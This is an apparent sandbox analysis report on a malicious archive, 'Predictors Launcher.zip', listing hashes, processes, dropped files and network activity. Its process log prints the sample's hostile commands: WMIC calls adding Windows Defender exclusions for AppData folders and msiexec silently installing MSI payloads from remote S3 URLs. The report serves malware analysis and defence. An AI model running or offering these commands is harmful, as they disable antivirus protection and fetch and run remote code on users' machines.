File name: Predictors Launcher.zip
Full analysis: https://app.any.run/tasks/95bff351-8beb-4545-b0f3-df4970292c14
Verdict: Malicious activity
Analysis date: November 30, 2020, 04:56:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: 89C4A743932432DA19F4618DDE07E04A
SHA1: 4A4C1CD2BFDD709AD355CD2B337DBD0BEE4386F2
SHA256: F56A2021AB0C2E24BC6BD384704739295A92694EA713F3057EC9D8AE9212C194
SSDEEP: 393216:qwNlj7V6fltnF8arHxgZOxqbh4V2nBMgPyXAU:l6ttnTjxgZOxW4ViNyQU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • Predictor Launcher.exe (PID: 552)
      • Predictor Launcher.exe (PID: 3024)
    • Uses Microsoft Installer as loader
      • Predictor Launcher.exe (PID: 552)
    • Changes settings of System certificates
      • msiexec.exe (PID: 3004)
  • SUSPICIOUS
    • Drops a file that was compiled in debug mode
      • WinRAR.exe (PID: 2876)
    • Executable content was dropped or overwritten
      • WinRAR.exe (PID: 2876)
    • Adds / modifies Windows certificates
      • msiexec.exe (PID: 3004)
    • Starts CMD.EXE for commands execution
      • Predictor Launcher.exe (PID: 552)
  • INFO
    • No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xpi | Mozilla Firefox browser extension (66.6)
.zip | ZIP compressed archive (33.3)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2017:02:14 07:38:11
ZipCRC: 0xdc9d6294
ZipCompressedSize: 1104
ZipUncompressedSize: 4149
ZipFileName: Predictors Launcher/AntiBusteds (1).dll
No data.
All screenshots are available in the full report
Total processes: 49
Monitored processes: 10
Malicious processes: 1
Suspicious processes: 1

Behavior graph (interactive in the full report; process nodes shown, "no specs" marks nodes without indicators): winrar.exe -> predictor launcher.exe (no specs), predictor launcher.exe, wmic.exe (no specs), wmic.exe (no specs), msiexec.exe (no specs), msiexec.exe, cmd.exe (no specs), msiexec.exe (no specs), notepad.exe (no specs)

Process information

PID: 2876
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Predictors Launcher.zip"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Version: 5.60.0

PID: 3024
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Predictor Launcher.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Predictor Launcher.exe
Parent process: WinRAR.exe
User: admin
Integrity Level: MEDIUM
Exit code: 3221226540

PID: 552
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Predictor Launcher.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Predictor Launcher.exe
Parent process: WinRAR.exe
User: admin
Integrity Level: HIGH
Exit code: 0

PID: 2496
CMD: "C:\Windows\System32\wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\Users\admin\AppData\Local
Path: C:\Windows\System32\wbem\WMIC.exe
Parent process: Predictor Launcher.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: WMI Commandline Utility
Exit code: 2147749902
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3316
CMD: "C:\Windows\System32\wbem\WMIC.exe" /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=C:\Users\admin\AppData\Roaming
Path: C:\Windows\System32\wbem\WMIC.exe
Parent process: Predictor Launcher.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: WMI Commandline Utility
Exit code: 2147749902
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3692
CMD: "C:\Windows\System32\msiexec.exe" /i https://sasosa.s3.amazonaws.com/EY3ZTKXKWRXB93ODV94761XD34RU0NUH.msi /qn
Path: C:\Windows\System32\msiexec.exe
Parent process: Predictor Launcher.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows® installer
Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID: 3004
CMD: C:\Windows\system32\msiexec.exe /V
Path: C:\Windows\system32\msiexec.exe
Parent process: services.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows® installer
Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID: 3784
CMD: "C:\Windows\System32\cmd.exe" taskkill / IM msiexec.exe
Path: C:\Windows\System32\cmd.exe
Parent process: Predictor Launcher.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Command Processor
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2008
CMD: "C:\Windows\System32\msiexec.exe" /i https://plugsa.s3.eu-west-2.amazonaws.com/reza.msi /qn
Path: C:\Windows\System32\msiexec.exe
Parent process: Predictor Launcher.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows® installer
Exit code: 1618
Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID: 2052
CMD: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\Rar$DIa2876.6267\READ IMPORTANT HOW TO INSTALL.txt
Path: C:\Windows\system32\NOTEPAD.EXE
Parent process: WinRAR.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Notepad
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 613
Read events: 569
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 8
Suspicious files: 0
Text files: 76
Unknown types: 0

Dropped files

PID: 2876 | Process: WinRAR.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\AntiBusteds (1).dll
MD5: 113F80EE3DC312A093CE9E89F95404FE
SHA256: 8D3C4839E54881B05E93887868F5ACD25E4A1B40A2C21239BB028A20D801D301

PID: 2876 | Process: WinRAR.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\AntiBusteds (2).dll
MD5: 113F80EE3DC312A093CE9E89F95404FE
SHA256: 8D3C4839E54881B05E93887868F5ACD25E4A1B40A2C21239BB028A20D801D301

PID: 2876 | Process: WinRAR.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\datetime.h
MD5: 958421EA055F38A3A54538A6C84795D5
SHA256: A80CA694DCCFE8EE65E3BBD2DFC57ADF2BE9464CA37EFE2B84471FF1FD61CDE7

PID: 2876 | Process: WinRAR.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\bytearrayobject.h
MD5: 0310F1528CA7A9966680F95117EA487E
SHA256: 400E6E276FC3FA823F29629FECFF302BD08D1ABB896FB500C4FAA334AA3293FD

PID: 2876 | Process: WinRAR.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\boolobject.h
MD5: DCC48FC557F8337D7BAA90E13D34B36A
SHA256: 9483A995582F2DDAD6B47F85BB300371346CA10E846B923170D39E523815134F

PID: 2876 | Process: WinRAR.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\complexobject.h
MD5: FA93753FDBEFD8869D0EFE7EBC0E52A7
SHA256: 581414618CD495C42A82C3F0AB1A4E3F10A294E2FB4BB1EFCFEB44BCD0EC3A42

PID: 2876 | Process: WinRAR.exe | Type: executable
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\Data\Ankama Helsa.dll
MD5: 1F8DB83C98BC6528589B061BD7055472
SHA256: 93D519B30A7D388FA983B14C94119088C3C3EA91512FE42D104E5343AA0F38E8

PID: 2876 | Process: WinRAR.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\ceval.h
MD5: AC76D8E98C4419356787EF0F0A70955C
SHA256: A50DDF6E874CFD1FD226080BF31E4636A2F5FAD806A4116CBD68EDB612932515

PID: 2876 | Process: WinRAR.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\bytesobject.h
MD5: EE293911E2B74B3AAF1F8599FB88FFB8
SHA256: 1582D6984B4FD2ED407CBD50B3AD97B79FA95451D39333F1D6966FAC40262974

PID: 2876 | Process: WinRAR.exe | Type: text
Filename: C:\Users\admin\AppData\Local\Temp\Rar$EXa2876.3575\Predictors Launcher\include\cellobject.h
MD5: BAA321AEBD7EF2A8D505C75B76F50BEC
SHA256: A277081668BC14F99518B3B7FBC8C8E1B98CC89BD3D1E6AB02D864ECE1209A9C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 1
DNS requests: 1
Threats: 0

HTTP requests

No HTTP requests

Connections

PID: 3004
Process: msiexec.exe
IP: 52.217.96.28:443
Domain: sasosa.s3.amazonaws.com
ASN: Amazon.com, Inc.
CN: US
Reputation: shared

DNS requests

Domain: sasosa.s3.amazonaws.com
IP: 52.217.96.28
Reputation: shared

Threats

No threats detected
No debug info